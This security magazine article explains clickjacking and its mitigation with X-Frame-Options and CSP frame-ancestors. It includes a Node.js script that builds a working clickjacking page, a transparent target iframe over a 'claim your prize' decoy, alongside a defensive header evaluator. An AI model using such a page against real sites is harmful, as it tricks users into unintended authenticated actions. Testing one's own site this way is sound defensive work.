Monthly Magazine "August 2021"
Published on 13-Sep-2021 13:52:00
What is clickjacking?
In short, clickjacking is the hijacking of a user's click. A clickjacking attack tricks a web user into clicking a link or performing an action they did not intend, by rendering an invisible page element on top of the control the user thinks they are clicking. The results range from sending users to unwanted pages, to capturing usernames, passwords or other sensitive input, to downloading malware. Clickjacking does not compromise the web site itself; it turns the site's legitimate, usually authenticated, functionality against the site's own users. What could an attacker do with a clickjacking attack?
• Harvest login credentials by rendering a fake login box on top of the real one.
• Trick users into turning on their webcam or microphone.
• Spread worms on social media sites.
• Spread malware by diverting users to malicious download links.
How could a hacker perform this attack?
Typically the attacker hides the target web site's UI and arranges the visible UI so that the user does not realise the click is landing on the target site. Because of this re-arrangement of the interface, the attack is also known as UI redressing or a UI redress attack. In practice a clickjacking page loads a page the user trusts, and is usually logged in to, in an iframe, then either makes the frame transparent and lays it over a harmless-looking decoy or renders invisible elements on top of the frame, so that the click reaches the real button inside the frame. To ensure that your site cannot be used in a clickjacking attack, you need to make sure it cannot be wrapped in an iframe by a site you do not control.
Is your site vulnerable to Clickjacking?
A basic way to test whether your site is vulnerable to clickjacking is to create an HTML page on another origin that includes your site in an iframe, and open it in a browser while you are logged in to your site (the attack targets authenticated users, so that is the case that matters). If your site renders inside the frame, it can be framed by third parties and is vulnerable. If the browser shows a blank frame or a "refused to connect" message, a framing protection is in effect; you can confirm which one by inspecting the response headers for X-Frame-Options or a Content-Security-Policy header with a frame-ancestors directive.
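The following Node.js script is an added example and is not code from the original article. It generates the test page described above: a visible decoy button with a transparent iframe of the target stacked on top of it, shifted so that the target's real button sits exactly under the decoy. The target URL, button offsets and decoy text are hypothetical placeholders for your own site; save the output as an HTML file, serve it from a different origin, and open it in a browser where you are logged in to the target.

```javascript
// Added example (not from the original article): build a clickjacking
// proof-of-concept page for a target URL. If the target renders inside the
// transparent frame when the page is opened, it can be framed by a third
// party. All URLs and offsets below are hypothetical.

// Escape a string for safe use inside an HTML attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// A visible decoy button sits at (decoyX, decoyY). The iframe of targetUrl is
// placed above it and shifted by (offsetX, offsetY), the position of the real
// button inside the target page, so that button ends up under the decoy.
// opacity 0 makes the frame invisible; use ~0.3 while aligning, then set 0.
function buildPocPage(targetUrl, opts = {}) {
  const {
    width = 1024, height = 768, offsetX = 0, offsetY = 0,
    decoyX = 40, decoyY = 40, opacity = 0,
  } = opts;
  const url = new URL(targetUrl); // throws on malformed input
  if (!/^https?:$/.test(url.protocol)) throw new Error("http(s) targets only");
  return `<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Clickjacking test</title>
<style>
  body { margin: 0; }
  /* Visible lure: what the victim believes they are clicking. */
  #decoy { position: absolute; left: ${decoyX}px; top: ${decoyY}px; z-index: 1;
           font-size: 18px; padding: 12px 24px; }
  /* Transparent target frame stacked above the lure; it receives the click. */
  #target { position: absolute; left: ${decoyX - offsetX}px; top: ${decoyY - offsetY}px;
            width: ${width}px; height: ${height}px; border: 0;
            opacity: ${opacity}; z-index: 2; }
</style>
</head>
<body>
<button id="decoy">Click to claim your prize</button>
<iframe id="target" src="${escapeHtml(url.href)}"></iframe>
</body>
</html>
`;
}

// Constructed demo: the sensitive button of the hypothetical target page sits
// 300px from the left and 220px from the top of that page.
function demo() {
  return buildPocPage("https://app.example.test/account", { offsetX: 300, offsetY: 220 });
}

// Run directly: node poc.js > poc.html
if (typeof require !== "undefined" && require.main === module) {
  process.stdout.write(demo());
}
```

The offsets are found by temporarily raising the frame's opacity, aligning the target's button with the decoy, and then setting the opacity back to 0. A site that sends a framing restriction will show an empty frame here no matter how the page is positioned.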
Clickjacking mitigation
There are two general ways to defend against clickjacking:
● Client-side methods – the most common is called frame busting: a script in the page checks whether it is running in the top-level window and, if not, tries to break out of the frame. Client-side methods can be effective in some cases, but are not considered best practice, because they are easily bypassed; for example, the attacker can load the page in an iframe with the sandbox attribute, which stops the frame-busting script from navigating the top window.
● Server-side methods – the most common is the X-Frame-Options response header. Server-side methods are recommended by security experts as the effective way to defend against clickjacking.
Mitigating clickjacking with X-Frame-Options
The X-Frame-Options response header is sent as part of the HTTP response of a web page and tells the browser whether it may render that page inside a <frame> or <iframe>. There are three values defined for the X-Frame-Options header:
- DENY – the page may not be displayed in a frame by any site, including its own.
- SAMEORIGIN – the page may be displayed in a frame only by pages from the same origin (same scheme, host and port) as the page itself.
- ALLOW-FROM URI – the page may be displayed in a frame only by the single origin given, for example ALLOW-FROM https://www.example.com. This value is obsolete: no current browser supports it, and a browser that sees it ignores the whole header, leaving the page frameable. When a list of permitted origins is needed, use the Content-Security-Policy frame-ancestors directive instead; it takes one or more origins (including wildcards such as https://*.example.com) and, when present, takes precedence over X-Frame-Options. Send X-Frame-Options alongside it only as a fallback for old browsers.
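The script below is an added example, not code from the original article, and covers both the server-side mitigation and the header values above: antiFramingHeaders() produces the headers a server should send (frame-ancestors for current browsers, X-Frame-Options as the fallback), and framingAllowed() predicts whether a browser would let a page carrying a given set of headers be framed by a given chain of ancestor origins, following the behaviour of current Chrome and Firefox (frame-ancestors wins when present; DENY and SAMEORIGIN are honoured; ALLOW-FROM or any other value causes the header to be ignored). The origins and header sets in demo() are constructed and do not refer to real sites.

```javascript
// Added example (not from the original article): generate anti-framing
// headers and evaluate how a modern browser would apply them. Origins and
// header values used in demo() are constructed.

// Headers to send. allowedOrigins is a list of CSP source expressions such as
// "'self'" or "https://*.partner.example"; an empty list denies all framing.
// X-Frame-Options is only a fallback for old browsers: SAMEORIGIN is the
// closest fail-closed match once third-party origins are allowed, because
// ALLOW-FROM is unsupported.
function antiFramingHeaders(allowedOrigins = []) {
  const list = allowedOrigins.length ? allowedOrigins.join(" ") : "'none'";
  return {
    "Content-Security-Policy": `frame-ancestors ${list}`,
    "X-Frame-Options": allowedOrigins.length ? "SAMEORIGIN" : "DENY",
  };
}

// Parse a Content-Security-Policy value into { directive: [sources] }.
function parseCsp(value) {
  const out = {};
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) out[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return out;
}

const DEFAULT_PORT = { "http:": "80", "https:": "443" };

// Does one frame-ancestors source expression match an ancestor origin?
function sourceMatches(src, ancestorOrigin, pageOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return ancestorOrigin === pageOrigin;
  if (src === "*") return true;
  const a = new URL(ancestorOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return a.protocol === src.toLowerCase(); // scheme-source, e.g. https:
  // host-source: [scheme://][*.]host[:port|:*]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/i.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && a.protocol !== scheme.toLowerCase() + ":") return false;
  const h = host.toLowerCase();
  if (wildcard ? !a.hostname.endsWith("." + h) : a.hostname !== h) return false;
  const aPort = a.port || DEFAULT_PORT[a.protocol] || "";
  const wanted = port ?? (DEFAULT_PORT[a.protocol] || ""); // no port given: default port only
  return wanted === "*" || aPort === wanted;
}

// ancestors: origins of every page in the framing chain (parent, grandparent,
// ...). Returns { allowed, reason }.
function framingAllowed(headers, pageOrigin, ancestors) {
  const self = new URL(pageOrigin).origin;
  const chain = ancestors.map((o) => new URL(o).origin);
  const header = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key === undefined ? undefined : headers[key];
  };
  const csp = header("content-security-policy");
  const fa = csp ? parseCsp(csp)["frame-ancestors"] : undefined;
  if (fa) { // frame-ancestors present: it governs and X-Frame-Options is ignored
    const ok = chain.every((anc) => fa.some((src) => sourceMatches(src, anc, self)));
    return { allowed: ok, reason: `frame-ancestors ${fa.join(" ")}` };
  }
  const xfo = header("x-frame-options");
  if (xfo === undefined) return { allowed: true, reason: "no framing restriction" };
  const v = xfo.trim().toUpperCase();
  if (v === "DENY") return { allowed: false, reason: "X-Frame-Options: DENY" };
  if (v === "SAMEORIGIN") {
    // Chrome and Firefox check every ancestor; older Safari compared only the
    // top-level document, so a nested same-origin frame could still be abused.
    return { allowed: chain.every((anc) => anc === self), reason: "X-Frame-Options: SAMEORIGIN" };
  }
  // ALLOW-FROM or any unrecognised value: the whole header is ignored.
  return { allowed: true, reason: `X-Frame-Options "${xfo}" is unsupported and ignored` };
}

// Constructed scenario: app.example.test wants to be embeddable only by itself
// and by partner widgets hosted on *.partner.example.
function demo() {
  const page = "https://app.example.test";
  const hdrs = antiFramingHeaders(["'self'", "https://*.partner.example"]);
  return {
    partner: framingAllowed(hdrs, page, ["https://widgets.partner.example"]).allowed,
    attacker: framingAllowed(hdrs, page, ["https://evil.example"]).allowed,
    nested: framingAllowed(hdrs, page, ["https://app.example.test", "https://evil.example"]).allowed,
    legacyAllowFrom: framingAllowed({ "X-Frame-Options": "ALLOW-FROM https://partner.example" },
      page, ["https://partner.example"]).allowed,
  };
}
```

Note the fallback choice in antiFramingHeaders(): when partner origins are allowed, an old browser that only understands X-Frame-Options will see SAMEORIGIN and refuse the partner's frame. That is the intended direction of failure; the alternative, omitting the header, would leave those browsers with no protection at all.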